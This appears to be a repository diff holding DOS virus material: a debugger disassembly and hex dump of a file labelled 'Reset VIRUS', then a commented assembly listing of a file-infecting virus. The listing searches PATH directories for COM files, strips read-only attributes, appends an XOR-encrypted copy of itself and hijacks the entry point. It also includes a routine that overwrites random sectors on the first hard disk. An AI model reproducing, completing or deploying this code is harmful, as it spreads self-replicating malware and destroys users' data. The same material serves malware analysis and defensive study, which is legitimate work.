114E:037E 3F AAS
|
||||
114E:037F 3F AAS
|
||||
114E:0380 3F AAS
|
||||
114E:0381 3F AAS
|
||||
114E:0382 3F AAS
|
||||
114E:0383 43 INC BX
|
||||
114E:0384 4F DEC DI
|
||||
114E:0385 4D DEC BP
|
||||
114E:0386 0301 ADD AX,[BX+DI]
|
||||
114E:0388 0000 ADD [BX+SI],AL
|
||||
114E:038A 002E8B26 ADD [268B],CH
|
||||
114E:038E 68 DB 68
|
||||
114E:038F 2020 AND [BX+SI],AH
|
||||
114E:0391 0121 ADD [BX+DI],SP
|
||||
114E:0393 0022 ADD [BP+SI],AH
|
||||
114E:0395 0000 ADD [BX+SI],AL
|
||||
114E:0397 005245 ADD [BP+SI+45],DL
|
||||
114E:039A 53 PUSH BX
|
||||
114E:039B 45 INC BP
|
||||
114E:039C 54 PUSH SP
|
||||
114E:039D 2E CS:
|
||||
114E:039E 43 INC BX
|
||||
114E:039F 4F DEC DI
|
||||
114E:03A0 4D DEC BP
|
||||
114E:03A1 0000 ADD [BX+SI],AL
|
||||
114E:03A3 4D DEC BP
|
||||
114E:03A4 00EA ADD DL,CH
|
||||
114E:03A6 F0 LOCK
|
||||
114E:03A7 FF00 INC WORD PTR [BX+SI]
|
||||
114E:03A9 F0 LOCK
|
||||
114E:03AA 16 PUSH SS
|
||||
114E:03AB 7C14 JL 03C1
|
||||
|
||||
Dump list:
|
||||
|
||||
114E:0000 CD 20 00 A0 00 9A F0 FE-1D F0 F4 02 84 0D 2F 03 . ............/.
|
||||
114E:0010 84 0D BC 02 84 0D 4C 0D-01 03 01 00 02 FF FF FF ......L.........
|
||||
114E:0020 FF FF FF FF FF FF FF FF-FF FF FF FF 44 11 4C 01 ............D.L.
|
||||
114E:0030 BE 10 14 00 18 00 4E 11-FF FF FF FF 00 00 00 00 ......N.........
|
||||
114E:0040 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
|
||||
114E:0050 CD 21 CB 00 00 00 00 00-00 00 00 00 00 20 20 20 .!...........
|
||||
114E:0060 20 20 20 20 20 20 20 20-00 00 00 00 00 20 20 20 .....
|
||||
114E:0070 20 20 20 20 20 20 20 20-00 00 00 00 00 00 00 00 ........
|
||||
114E:0080 01 20 0D 65 73 65 74 76-2E 63 6F 6D 20 0D 63 3A . .esetv.com .c:
|
||||
114E:0090 0D 65 6B 5C 64 62 61 73-65 3B 63 3A 5C 6E 79 65 .ek\dbase;c:\nye
|
||||
114E:00A0 6C 76 65 6B 5C 63 6C 69-70 70 65 72 3B 63 3A 5C lvek\clipper;c:\
|
||||
114E:00B0 6E 79 65 6C 76 65 6B 5C-66 6C 61 73 68 3B 63 3A nyelvek\flash;c:
|
||||
114E:00C0 5C 6E 79 65 6C 76 65 6B-5C 70 61 73 63 61 6C 3B \nyelvek\pascal;
|
||||
114E:00D0 63 3A 5C 75 74 69 6C 0D-00 00 00 00 00 00 00 00 c:\util.........
|
||||
114E:00E0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
|
||||
114E:00F0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
|
||||
114E:0100 E9 1F 00 49 60 61 6D 20-61 20 52 65 73 65 74 20 ...I`am a Reset
|
||||
114E:0110 56 49 52 55 53 21 24 BA-03 01 B4 09 CD 21 B4 00 VIRUS!$......!..
|
||||
114E:0120 CD 20 51 BA 1B 03 FC 8B-F2 81 C6 0A 00 BF 00 01 . Q.............
|
||||
114E:0130 B9 03 00 F3 A4 8B F2 B4-30 CD 21 3C 00 75 03 E9 ........0.!<.u..
|
||||
114E:0140 C7 01 06 B4 2F CD 21 89-9C 00 00 8C 84 02 00 07 ..../.!.........
|
||||
114E:0150 BA 5F 00 90 03 D6 B4 1A-CD 21 06 56 8E 06 2C 00 ._.......!.V..,.
|
||||
114E:0160 BF 00 00 5E 56 81 C6 1A-00 AC B9 00 80 F2 AE B9 ...^V...........
|
||||
114E:0170 04 00 AC AE 75 ED E2 FA-5E 07 89 BC 16 00 8B FE ....u...^.......
|
||||
114E:0180 81 C7 1F 00 8B DE 81 C6-1F 00 8B FE EB 3A 83 BC .............:..
|
||||
114E:0190 16 00 00 75 03 E9 63 01-1E 56 26 8E 1E 2C 00 8B ...u..c..V&..,..
|
||||
114E:01A0 FE 26 8B B5 16 00 81 C7-1F 00 AC 3C 3B 74 0A 3C .&.........<;t.<
|
||||
114E:01B0 00 74 03 AA EB F4 BE 00-00 5B 1F 89 B7 16 00 80 .t.......[......
|
||||
114E:01C0 7D FF 5C 74 03 B0 5C AA-89 BF 18 00 8B F3 81 C6 }.\t..\.........
|
||||
114E:01D0 10 00 B9 06 00 F3 A4 8B-F3 B4 4E BA 1F 00 90 03 ..........N.....
|
||||
114E:01E0 D6 B9 03 00 CD 21 EB 04-B4 4F CD 21 73 02 EB 9E .....!...O.!s...
|
||||
114E:01F0 8B 84 75 00 24 1F 3C 1F-74 EE 81 BC 79 00 00 FA ..u.$.<.t...y...
|
||||
114E:0200 77 E6 83 BC 79 00 0A 72-DF 8B BC 18 00 56 81 C6 w...y..r.....V..
|
||||
114E:0210 7D 00 AC AA 3C 00 75 FA-5E B8 00 43 BA 1F 00 90 }...<.u.^..C....
|
||||
114E:0220 03 D6 CD 21 89 8C 08 00-B8 01 43 81 E1 FE FF BA ...!......C.....
|
||||
114E:0230 1F 00 90 03 D6 CD 21 B8-02 3D BA 1F 00 90 03 D6 ......!..=......
|
||||
114E:0240 CD 21 73 03 E9 A5 00 8B-D8 B8 00 57 CD 21 89 8C .!s........W.!..
|
||||
114E:0250 04 00 89 94 06 00 B4 2C-CD 21 80 E6 07 75 10 B4 .......,.!...u..
|
||||
114E:0260 40 B9 05 00 8B D6 81 C2-8A 00 CD 21 EB 65 90 B4 @..........!.e..
|
||||
114E:0270 3F B9 03 00 BA 0A 00 90-03 D6 CD 21 72 55 3D 03 ?..........!rU=.
|
||||
114E:0280 00 75 50 B8 02 42 B9 00-00 BA 00 00 CD 21 72 43 .uP..B.......!rC
|
||||
114E:0290 8B C8 2D 03 00 89 84 0E-00 81 C1 F9 02 8B FE 81 ..-.............
|
||||
114E:02A0 EF F7 01 89 0D B4 40 B9-88 02 8B D6 81 EA F9 01 ......@.........
|
||||
114E:02B0 CD 21 72 1F 3D 88 02 75-1A B8 00 42 B9 00 00 BA .!r.=..u...B....
|
||||
114E:02C0 00 00 CD 21 72 0D B4 40-B9 03 00 8B D6 81 C2 0D ...!r..@........
|
||||
114E:02D0 00 CD 21 8B 94 06 00 8B-8C 04 00 81 E1 E0 FF 81 ..!.............
|
||||
114E:02E0 C9 1F 00 B8 01 57 CD 21-B4 3E CD 21 B8 01 43 8B .....W.!.>.!..C.
|
||||
114E:02F0 8C 08 00 BA 1F 00 90 03-D6 CD 21 1E B4 1A 8B 94 ..........!.....
|
||||
114E:0300 00 00 8E 9C 02 00 CD 21-1F 59 33 C0 33 DB 33 D2 .......!.Y3.3.3.
|
||||
114E:0310 33 F6 BF 00 01 57 33 FF-C2 FF FF 80 00 46 0D 20 3....W3......F.
|
||||
114E:0320 01 21 00 20 00 EB 15 90-E9 1F 00 2A 2E 43 4F 4D .!. .......*.COM
|
||||
114E:0330 00 28 00 47 03 50 41 54-48 3D 52 45 53 45 54 2E .(.G.PATH=RESET.
|
||||
114E:0340 43 4F 4D 00 00 00 00 4D-00 44 49 54 2E 43 4F 4D COM....M.DIT.COM
|
||||
114E:0350 00 00 20 20 20 20 20 20-20 20 20 20 20 20 20 20 ..
|
||||
114E:0360 20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20
|
||||
114E:0370 20 20 20 20 20 20 20 20-20 20 01 3F 3F 3F 3F 3F .?????
|
||||
114E:0380 3F 3F 3F 43 4F 4D 03 01-00 00 00 2E 8B 26 68 20 ???COM.......&h
|
||||
114E:0390 20 01 21 00 22 00 00 00-52 45 53 45 54 2E 43 4F .!."...RESET.CO
|
||||
114E:03A0 4D 00 00 4D 00 EA F0 FF-00 F0 16 7C 14 M..M.......|.
|
||||
|
||||
|
|
@ -0,0 +1,533 @@
|
|||
seg_a segment byte public
|
||||
assume cs:seg_a, ds:seg_a
|
||||
|
||||
org 100h
|
||||
|
||||
start: jmp l_02F3 ;0100 E9 01F0
|
||||
db 6Bh,73h,0CAh,0Eh ;contamination ptr ;0103 6B 73 CA 0E
|
||||
|
||||
|
||||
org 2F3h
|
||||
;----------------------------------------------
|
||||
l_02F3: push cx ;02F3 51
|
||||
mov dx,offset d_0683 ;coded virus part addr ;02F4 BA 0683
|
||||
nop ;02F7 90
|
||||
|
||||
;<--------- encoding
|
||||
push dx ;02F8 52
|
||||
pop bx ;02F9 5B
|
||||
mov cx,0F9h ;coded block length ;02FA B9 00F9
|
||||
mov si,dx ;02FD 8B F2
|
||||
dec si ;02FF 4E
|
||||
mov dl,[si] ;0300 8A 14
|
||||
inc si ;0302 46
|
||||
l_0303: mov al,[bx] ;encoding loop ;0303 8A 07
|
||||
xor al,dl ;0305 32 C2
|
||||
nop ;0307 90
|
||||
mov [bx],al ;0308 88 07
|
||||
inc bx ;030A 43
|
||||
loop l_0303 ;030B E2 F6
|
||||
mov dx,si ;030D 8B D6
|
||||
|
||||
;<----- restore changed bytes
|
||||
xor ax,ax ;030F 33 C0
|
||||
xor bx,bx ;0311 33 DB
|
||||
cld ;0313 FC
|
||||
mov si,dx ;0314 8B F2
|
||||
add si,0ADh ;x_00AD ;saved bytes address ;0316 .81 C6 00AD
|
||||
mov di,100h ;target address ;031A .BF 0100
|
||||
mov cx,7 ;changed bytes ;031D B9 0007
|
||||
nop ;0320 90
|
||||
rep movsb ;0321 F3/ A4
|
||||
|
||||
mov si,dx ;0323 8B F2
|
||||
mov byte ptr ds:[si+0F8h],0 ;x_00F8 ;0325 C6 84 00F8 00
|
||||
mov ah,30h ;get DOS version nr ;032A B4 30
|
||||
int 21h ;032C CD 21
|
||||
cmp al,0 ;major version ;032E 3C 00
|
||||
nop ;0330 90
|
||||
jnz l_0335 ;0331 75 02
|
||||
nop ;0333 90
|
||||
nop ;0334 90
|
||||
l_0335: mov bp,0BFh ;x_00BF ;0335 BD 00BF
|
||||
add bp,si ;0338 03 EE
|
||||
mov byte ptr ds:[bp],0 ;033A 3E: C6 46 00 00
|
||||
push es ;033F 06
|
||||
nop ;0340 90
|
||||
mov ah,2Fh ;get DTA ptr into es:bx ;0341 B4 2F
|
||||
int 21h ;0343 CD 21
|
||||
mov [si],bx ;x_0000 ;0345 89 1C
|
||||
mov [si+2],es ;x_0002 ;0347 8C 44 02
|
||||
pop es ;034A 07
|
||||
mov dx,5Fh ;x_005F ;034B .BA 005F
|
||||
add dx,si ;034E 03 D6
|
||||
mov ah,1Ah ;set DTA to ds:dx ;0350 B4 1A
|
||||
int 21h ;0352 CD 21
|
||||
push es ;0354 06
|
||||
push si ;0355 56
|
||||
mov es,ds:[2Ch] ;environment segment ;0356 8E 06 002C
|
||||
mov di,0 ;035A .BF 0000
|
||||
l_035D: pop si ;035D 5E
|
||||
push si ;035E 56
|
||||
add si,1Ah ;x_001A ('PATH=') ;035F 83 C6 1A
|
||||
lodsb ;0362 AC
|
||||
mov cx,8000h ;0363 B9 8000
|
||||
repne scasb ;0366 F2/ AE
|
||||
mov cx,4 ;0368 B9 0004
|
||||
l_036B: lodsb ;036B AC
|
||||
scasb ;036C AE
|
||||
jnz l_035D ;036D 75 EE
|
||||
loop l_036B ;036F E2 FA
|
||||
|
||||
;<----- Environment variable 'PATH='
|
||||
pop si ;0371 5E
|
||||
pop es ;0372 07
|
||||
mov [si+16h],di ;x_0016 ;0373 89 7C 16
|
||||
mov di,si ;0376 8B FE
|
||||
add di,1Fh ;x_001F = work buffer ;0378 83 C7 1F
|
||||
mov bx,si ;037B 8B DE
|
||||
add si,1Fh ;x_001F = work buffer ;037D 83 C6 1F
|
||||
mov di,si ;0380 8B FE
|
||||
jmp short l_03CE ;0382 EB 4A
|
||||
|
||||
;<----- next directory
|
||||
l_0384: cmp word ptr [si+16h],0 ;x_0016 = ptr in env ;0384 83 7C 16 00
|
||||
jne l_0392 ;-> not all in 'PATH' ;0388 75 08
|
||||
mov byte ptr ds:[si+0F8h],1 ;<- end of 'PATH' ;038A C6 84 00F8 01
|
||||
jmp l_04E9 ;038F E9 0157
|
||||
|
||||
l_0392: push ds ;0392 1E
|
||||
push si ;0393 56
|
||||
mov bp,0BFh ;x_00BF ;0394 .BD 00BF
|
||||
add bp,si ;0397 03 EE
|
||||
mov ds,es:[02Ch] ;environment segment ;0399 26: 8E 1E 002C
|
||||
mov di,si ;039E 8B FE
|
||||
mov si,es:[di+16h] ;ptr in environment ;03A0 26: 8B 75 16
|
||||
add di,1Fh ;pattern address ;03A4 83 C7 1F
|
||||
l_03A7: lodsb ;03A7 AC
|
||||
cmp al,';' ;directory delimiter ;03A8 3C 3B
|
||||
je l_03BB ;03AA 74 0F
|
||||
cmp al,0 ;03AC 3C 00
|
||||
je l_03B8 ;position delimiter ;03AE 74 08
|
||||
mov es:[bp],al ;03B0 26: 88 46 00
|
||||
inc bp ;03B4 45
|
||||
stosb ;03B5 AA
|
||||
jmp short l_03A7 ;03B6 EB EF
|
||||
|
||||
l_03B8: mov si,0 ;end of path ptr ;03B8 .BE 0000
|
||||
l_03BB: pop bx ;03BB 5B
|
||||
pop ds ;03BC 1F
|
||||
mov [bx+16h],si ;save current ptr ;03BD 89 77 16
|
||||
cmp byte ptr [di-1],'\' ;last path char ;03C0 80 7D FF 5C
|
||||
je l_03CE ;-> o.k. ;03C4 74 08
|
||||
mov al,'\' ;<- add dir delimiter ;03C6 B0 5C
|
||||
mov es:[bp],al ;03C8 26: 88 46 00
|
||||
inc bp ;03CC 45
|
||||
stosb ;03CD AA
|
||||
|
||||
l_03CE: mov byte ptr es:[bp],0 ;x_00BF ;03CE 26: C6 46 00 00
|
||||
mov bp,0 ;03D3 BD 0000
|
||||
mov [bx+18h],di ;[x_0018]:=x_001F ;03D6 89 7F 18
|
||||
mov si,bx ;offset d_0683 ;03D9 8B F3
|
||||
add si,10h ;x_0010 ('*.COM') ;03DB 83 C6 10
|
||||
mov cx,6 ;03DE B9 0006
|
||||
rep movsb ;03E1 F3/ A4
|
||||
mov si,bx ;03E3 8B F3
|
||||
mov ah,4Eh ;find 1st filenam match @ds:dx ;03E5 B4 4E
|
||||
mov dx,01Fh ;x_001F (file pattern) ;03E7 .BA 001F
|
||||
add dx,si ;03EA 03 D6
|
||||
mov cx,3 ;attribute pattern ;03EC B9 0003
|
||||
int 21h ;03EF CD 21
|
||||
jmp short l_0429 ;03F1 EB 36
|
||||
|
||||
;<----- next file in the same directory
|
||||
l_03F3: mov bp,0BFh ;file name address ;03F3 .BD 00BF
|
||||
add bp,si ;03F6 03 EE
|
||||
push bp ;03F8 55
|
||||
mov ax,0 ;03F9 B8 0000
|
||||
dec bp ;03FC 4D
|
||||
l_03FD: inc bp ;03FD 45
|
||||
cmp byte ptr ds:[bp],'\' ;begin of file name ;03FE 3E: 80 7E 00 5C
|
||||
jne l_0407 ;0403 75 02
|
||||
mov ax,bp ;possibly here ;0405 8B C5
|
||||
l_0407: cmp byte ptr ds:[bp],0 ;end of filename ? ;0407 3E: 80 7E 00 00
|
||||
jne l_03FD ;-> not now ;040C 75 EF
|
||||
cmp ax,0 ;have been any dir ? ;040E 3D 0000
|
||||
pop bp ;0411 5D
|
||||
jnz l_041B ;-> yes ;0412 75 07
|
||||
mov byte ptr ds:[bp],0 ;<- we are in the root ;0414 3E: C6 46 00 00
|
||||
jmp short l_0425 ;0419 EB 0A
|
||||
|
||||
l_041B: mov bp,ax ;end of path address ;041B 8B E8
|
||||
mov byte ptr ds:[bp+1],0 ;end ptr ;041D 3E: C6 46 01 00
|
||||
mov bp,0 ;0422 BD 0000
|
||||
l_0425: mov ah,4Fh ;find next file match ;0425 B4 4F
|
||||
int 21h ;0427 CD 21
|
||||
|
||||
|
||||
l_0429: jnc l_042E ;0429 73 03
|
||||
jmp l_0384 ;-> end of files in current dir ;042B E9 FF56
|
||||
|
||||
l_042E: mov bp,0BFh ;x_00BF = victim name ;042E .BD 00BF
|
||||
add bp,si ;0431 03 EE
|
||||
dec bp ;0433 4D
|
||||
l_0434: inc bp ;0434 45
|
||||
cmp byte ptr ds:[bp],0 ;find end of path ;0435 3E: 80 7E 00 00
|
||||
jne l_0434 ;043A 75 F8
|
||||
mov di,bp ;043C 8B FD
|
||||
mov bp,0 ;043E BD 0000
|
||||
push si ;0441 56
|
||||
add si,7Dh ;x_007D - DTA-file name ;0442 83 C6 7D
|
||||
l_0445: lodsb ;add file name ;0445 AC
|
||||
stosb ;0446 AA
|
||||
cmp al,0 ;0447 3C 00
|
||||
jne l_0445 ;0449 75 FA
|
||||
pop si ;044B 5E
|
||||
mov dx,si ;044C 8B D6
|
||||
add dx,0BFh ;x_00BF = file name ;044E .81 C2 00BF
|
||||
mov ax,3D00h ;open file R/O ;0452 B8 3D00
|
||||
int 21h ;0455 CD 21
|
||||
jnc l_045C ;0457 73 03
|
||||
jmp l_0384 ;-> error, next dir ;0459 E9 FF28
|
||||
|
||||
l_045C: mov bx,ax ;file handle ;045C 8B D8
|
||||
mov dx,0B8h ;x_00B8 = file buffer ;045E .BA 00B8
|
||||
add dx,si ;0461 03 D6
|
||||
mov cx,7 ;bytes to read ;0463 B9 0007
|
||||
mov ah,3Fh ;read handle ;0466 B4 3F
|
||||
int 21h ;0468 CD 21
|
||||
mov ah,3Eh ;close handle ;046A B4 3E
|
||||
int 21h ;046C CD 21
|
||||
mov di,0BBh ;4,5,6,7 bytes from file;046E .BF 00BB
|
||||
add di,si ;0471 03 FE
|
||||
mov bx,0B4h ;contam. ptr pattern ;0473 .BB 00B4
|
||||
add bx,si ;0476 03 DE
|
||||
mov ax,[di] ;0478 8B 05
|
||||
cmp ax,[bx] ;047A 3B 07
|
||||
jne l_0489 ;-> not infected yet ;047C 75 0B
|
||||
mov ax,[di+2] ;047E 8B 45 02
|
||||
cmp ax,[bx+2] ;0481 3B 47 02
|
||||
jne l_0489 ;-> not infected yet ;0484 75 03
|
||||
l_0486: jmp l_03F3 ;-> allready infected ;0486 E9 FF6A
|
||||
|
||||
l_0489: cmp word ptr [si+79h],0FA00h ;file size ;0489 81 7C 79 FA00
|
||||
nop ;048E 90
|
||||
ja l_0486 ;-> to big ;048F 77 F5
|
||||
cmp word ptr [si+79h],0Ah ;file size ;0491 83 7C 79 0A
|
||||
jb l_0486 ;-> to small ;0495 72 EF
|
||||
mov di,[si+18h] ;678Bh ?? ;0497 8B 7C 18
|
||||
push si ;049A 56
|
||||
add si,7Dh ;DTA - file name ;049B 83 C6 7D
|
||||
l_049E: lodsb ;049E AC
|
||||
stosb ;049F AA
|
||||
cmp al,0 ;04A0 3C 00
|
||||
jne l_049E ;04A2 75 FA
|
||||
pop si ;04A4 5E
|
||||
mov ax,4300h ;get file attrb, nam@ds:dx ;04A5 B8 4300
|
||||
mov dx,01Fh ;file name ;04A8 .BA 001F
|
||||
push si ;04AB 56
|
||||
pop si ;04AC 5E
|
||||
add dx,si ;04AD 03 D6
|
||||
int 21h ;04AF CD 21
|
||||
mov [si+8],cx ;save oryginal attributes ;04B1 89 4C 08
|
||||
mov ax,4301h ;set file attrb, nam@ds:dx ;04B4 B8 4301
|
||||
and cl,0FEh ;clear R/O ;04B7 80 E1 FE
|
||||
mov dx,01Fh ;04BA .BA 001F
|
||||
add dx,si ;04BD 03 D6
|
||||
int 21h ;04BF CD 21
|
||||
|
||||
mov ax,3D02h ;open file R/W ;04C1 B8 3D02
|
||||
mov dx,01Fh ;file name address ;04C4 .BA 001F
|
||||
add dx,si ;04C7 03 D6
|
||||
int 21h ;04C9 CD 21
|
||||
jnc l_04D0 ;-> O.K. ;04CB 73 03
|
||||
jmp l_0638 ;-> error ;04CD E9 0168
|
||||
l_04D0: mov bx,ax ;file handle ;04D0 8B D8
|
||||
mov ax,5700h ;get file date & time ;04D2 B8 5700
|
||||
int 21h ; DOS Services ah=function 57h ;04D5 CD 21
|
||||
mov [si+4],cx ;04D7 89 4C 04
|
||||
mov [si+6],dx ;04DA 89 54 06
|
||||
mov ah,2Ch ;get time ;04DD B4 2C
|
||||
int 21h ;04DF CD 21
|
||||
and dh,7 ;seconds ;04E1 80 E6 07
|
||||
jz l_04E9 ;04E4 74 03
|
||||
jmp l_0572 ;-> contamine ;04E6 E9 0089
|
||||
|
||||
;<- end of 'PATH' members
|
||||
l_04E9: push bx ;04E9 53
|
||||
push si ;04EA 56
|
||||
mov ah,8 ;read parameters for drive dl ;04EB B4 08
|
||||
mov dl,80h ;HDD 0 ;04ED B2 80
|
||||
int 13h ;04EF CD 13
|
||||
cmp dl,0 ;nr of fixed disks ;04F1 80 FA 00
|
||||
je l_0562 ;-> no HDD ;04F4 74 6C
|
||||
mov al,cl ;04F6 8A C1
|
||||
and al,3Fh ; '?' ;04F8 24 3F
|
||||
mov ds:[si+0F4h],al ;04FA 88 84 00F4
|
||||
mov al,ch ;04FE 8A C5
|
||||
mov ah,cl ;0500 8A E1
|
||||
and ah,0C0h ;0502 80 E4 C0
|
||||
mov cl,6 ;0505 B1 06
|
||||
shr ah,cl ;0507 D2 EC
|
||||
mov ds:[si+0F1h],ax ;0509 89 84 00F1
|
||||
mov ds:[si+0F3h],dh ;050D 88 B4 00F3
|
||||
l_0511: mov ah,2Ch ; ',' ;0511 B4 2C
|
||||
int 21h ; DOS Services ah=function 2Ch ;0513 CD 21
|
||||
; get time, cx=hrs/min, dh=sec
|
||||
shr dl,1 ;0515 D0 EA
|
||||
shr dl,1 ;0517 D0 EA
|
||||
and dl,7 ;0519 80 E2 07
|
||||
cmp dl,ds:[si+0F3h] ;051C 3A 94 00F3
|
||||
ja l_0511 ;0520 77 EF
|
||||
mov ds:[si+0F7h],dl ;0522 88 94 00F7
|
||||
push ds ;0526 1E
|
||||
mov ax,0 ;0527 B8 0000
|
||||
mov ds,ax ;052A 8E D8
|
||||
mov bx,046Ch ;052C .BB 046C
|
||||
mov ax,[bx] ;052F 8B 07
|
||||
mov dx,[bx+2] ;0531 8B 57 02
|
||||
pop ds ;0534 1F
|
||||
div word ptr ds:[si+0F1h] ;0535 F7 B4 00F1
|
||||
l_0539: cmp dx,ds:[si+0F1h] ;0539 3B 94 00F1
|
||||
jbe l_0543 ;053D 76 04
|
||||
shr dx,1 ;053F D1 EA
|
||||
jmp short l_0539 ;0541 EB F6
|
||||
l_0543: mov ds:[si+0F5h],dx ;0543 89 94 00F5
|
||||
mov ax,dx ;0547 8B C2
|
||||
mov dl,80h ;0549 B2 80
|
||||
mov dh,ds:[si+0F7h] ;054B 8A B4 00F7
|
||||
mov ch,al ;054F 8A E8
|
||||
mov cl,6 ;0551 B1 06
|
||||
shl ah,cl ;0553 D2 E4
|
||||
mov cl,ah ;0555 8A CC
|
||||
mov ah,3 ;0557 B4 03
|
||||
or cl,1 ;0559 80 C9 01
|
||||
mov al,ds:[si+0F4h] ;055C 8A 84 00F4
|
||||
int 13h ; Disk dl=drive 0 ah=func 03h ;0560 CD 13
|
||||
; write sectors from mem es:bx
|
||||
|
||||
;<-----
|
||||
l_0562: pop si ;0562 5E
|
||||
pop bx ;0563 5B
|
||||
cmp byte ptr ds:[si+0F8h],0 ;x_00F8 ;0564 80 BC 00F8 00
|
||||
je l_056E ;-> O.K. ;0569 74 03
|
||||
jmp l_0647 ;-> no 'PATH' ;056B E9 00D9
|
||||
|
||||
l_056E: jmp l_0628 ;056E E9 00B7
|
||||
nop ;0571 90
|
||||
|
||||
;<----- contamine file
|
||||
l_0572: mov ah,3Fh ; '?' ;0572 B4 3F
|
||||
mov cx,7 ;0574 B9 0007
|
||||
mov dx,0ADh ;0577 .BA 00AD
|
||||
add dx,si ;057A 03 D6
|
||||
int 21h ; DOS Services ah=function 3Fh ;057C CD 21
|
||||
; read file, cx=bytes, to ds:dx
|
||||
jnc l_0583 ;057E 73 03
|
||||
jmp l_0628 ;0580 E9 00A5
|
||||
l_0583: cmp ax,7 ;0583 3D 0007
|
||||
je l_058B ;0586 74 03
|
||||
jmp l_0628 ;0588 E9 009D
|
||||
l_058B: mov ax,4202h ;058B B8 4202
|
||||
mov cx,0 ;058E B9 0000
|
||||
mov dx,0 ;0591 BA 0000
|
||||
int 21h ; DOS Services ah=function 42h ;0594 CD 21
|
||||
; move file ptr, cx,dx=offset
|
||||
jnc l_059B ;0596 73 03
|
||||
jmp l_0628 ;0598 E9 008D
|
||||
l_059B: mov cx,ax ;059B 8B C8
|
||||
sub ax,3 ;059D 2D 0003
|
||||
mov [si+0Eh],ax ;05A0 89 44 0E
|
||||
add cx,490h ;05A3 81 C1 0490
|
||||
mov di,si ;05A7 8B FE
|
||||
sub di,38Eh ;05A9 81 EF 038E
|
||||
mov [di],cx ;05AD 89 0D
|
||||
mov ah,40h ; '@' ;05AF B4 40
|
||||
mov cx,489h ;05B1 B9 0489
|
||||
mov dx,si ;05B4 8B D6
|
||||
sub dx,390h ;05B6 81 EA 0390
|
||||
push dx ;05BA 52
|
||||
push cx ;05BB 51
|
||||
push bx ;05BC 53
|
||||
push ax ;05BD 50
|
||||
mov ah,2Ch ; ',' ;05BE B4 2C
|
||||
int 21h ; DOS Services ah=function 2Ch ;05C0 CD 21
|
||||
; get time, cx=hrs/min, dh=sec
|
||||
mov dl,cl ;05C2 8A D1
|
||||
add dl,dh ;05C4 02 D6
|
||||
add dl,82h ;05C6 80 C2 82
|
||||
mov [si-1],dl ;05C9 88 54 FF
|
||||
mov bx,si ;05CC 8B DE
|
||||
mov cx,0F9h ;05CE B9 00F9
|
||||
|
||||
l_05D1: mov al,[bx] ;05D1 8A 07
|
||||
xor al,dl ;05D3 32 C2
|
||||
mov [bx],al ;05D5 88 07
|
||||
inc bx ;05D7 43
|
||||
loop l_05D1 ;05D8 E2 F7
|
||||
|
||||
pop ax ;05DA 58
|
||||
pop bx ;05DB 5B
|
||||
pop cx ;05DC 59
|
||||
pop dx ;05DD 5A
|
||||
int 21h ; DOS Services ah=function 40h ;05DE CD 21
|
||||
; write file cx=bytes, to ds:dx
|
||||
push dx ;05E0 52
|
||||
push cx ;05E1 51
|
||||
push bx ;05E2 53
|
||||
push ax ;05E3 50
|
||||
mov bx,si ;05E4 8B DE
|
||||
mov cx,0F9h ;05E6 B9 00F9
|
||||
mov dl,[si-1] ;05E9 8A 54 FF
|
||||
|
||||
l_05EC: mov al,[bx] ;05EC 8A 07
|
||||
xor al,dl ;05EE 32 C2
|
||||
nop ;05F0 90
|
||||
mov [bx],al ;05F1 88 07
|
||||
inc bx ;05F3 43
|
||||
loop l_05EC ;05F4 E2 F6
|
||||
|
||||
pop ax ;05F6 58
|
||||
pop bx ;05F7 5B
|
||||
pop cx ;05F8 59
|
||||
pop dx ;05F9 5A
|
||||
jc l_0628 ;05FA 72 2C
|
||||
cmp ax,489h ;05FC 3D 0489
|
||||
jne l_0628 ;05FF 75 27
|
||||
mov ax,4200h ;0601 B8 4200
|
||||
nop ;0604 90
|
||||
mov cx,0 ;0605 B9 0000
|
||||
mov dx,0 ;0608 BA 0000
|
||||
int 21h ; DOS Services ah=function 42h ;060B CD 21
|
||||
; move file ptr, cx,dx=offset
|
||||
jc l_0628 ;060D 72 19
|
||||
mov ah,40h ; '@' ;060F B4 40
|
||||
mov cx,3 ;0611 B9 0003
|
||||
mov dx,si ;0614 8B D6
|
||||
add dx,0Dh ;0616 83 C2 0D
|
||||
int 21h ; DOS Services ah=function 40h ;0619 CD 21
|
||||
; write file cx=bytes, to ds:dx
|
||||
mov cx,4 ;061B B9 0004
|
||||
mov dx,si ;061E 8B D6
|
||||
add dx,0B4h ;0620 .81 C2 00B4
|
||||
mov ah,40h ; '@' ;0624 B4 40
|
||||
int 21h ; DOS Services ah=function 40h ;0626 CD 21
|
||||
; write file cx=bytes, to ds:dx
|
||||
l_0628: mov dx,[si+6] ;0628 8B 54 06
|
||||
nop ;062B 90
|
||||
mov cx,[si+4] ;062C 8B 4C 04
|
||||
mov ax,5701h ;062F B8 5701
|
||||
int 21h ; DOS Services ah=function 57h ;0632 CD 21
|
||||
; get/set file date & time
|
||||
mov ah,3Eh ; '>' ;0634 B4 3E
|
||||
int 21h ; DOS Services ah=function 3Eh ;0636 CD 21
|
||||
; close file, bx=file handle
|
||||
l_0638: mov ax,4301h ;0638 B8 4301
|
||||
mov cx,[si+8] ;063B 8B 4C 08
|
||||
mov dx,01Fh ;063E .BA 001F
|
||||
nop ;0641 90
|
||||
add dx,si ;0642 03 D6
|
||||
nop ;0644 90
|
||||
int 21h ; DOS Services ah=function 43h ;0645 CD 21
|
||||
; get/set file attrb, nam@ds:dx
|
||||
|
||||
;<----- EXIT
|
||||
l_0647: push ds ;0647 1E
|
||||
mov ah,1Ah ;set DTA to ds:dx ;0648 B4 1A
|
||||
mov dx,[si] ;saved victim DTA ;064A 8B 14
|
||||
mov ds,[si+2] ;064C 8E 5C 02
|
||||
int 21h ;064F CD 21
|
||||
pop ds ;restore registers ;0651 1F
|
||||
pop cx ;0652 59
|
||||
xor ax,ax ;0653 33 C0
|
||||
xor bx,bx ;0655 33 DB
|
||||
xor dx,dx ;0657 33 D2
|
||||
xor si,si ;0659 33 F6
|
||||
nop ;065B 90
|
||||
mov di,100h ;Victim entry point ;065C .BF 0100
|
||||
nop ;065F 90
|
||||
push di ;0660 57
|
||||
nop ;0661 90
|
||||
xor di,di ;0662 33 FF
|
||||
retn ;-> run victim ;0664 C3
|
||||
|
||||
db 1,2,3 ;0665 01 02 03
|
||||
db 1,2,3 ;0668 01 02 03
|
||||
db 4,5,6 ;066B 04 05 06
|
||||
|
||||
db 0Dh,0Ah ;066E 0D 0A
|
||||
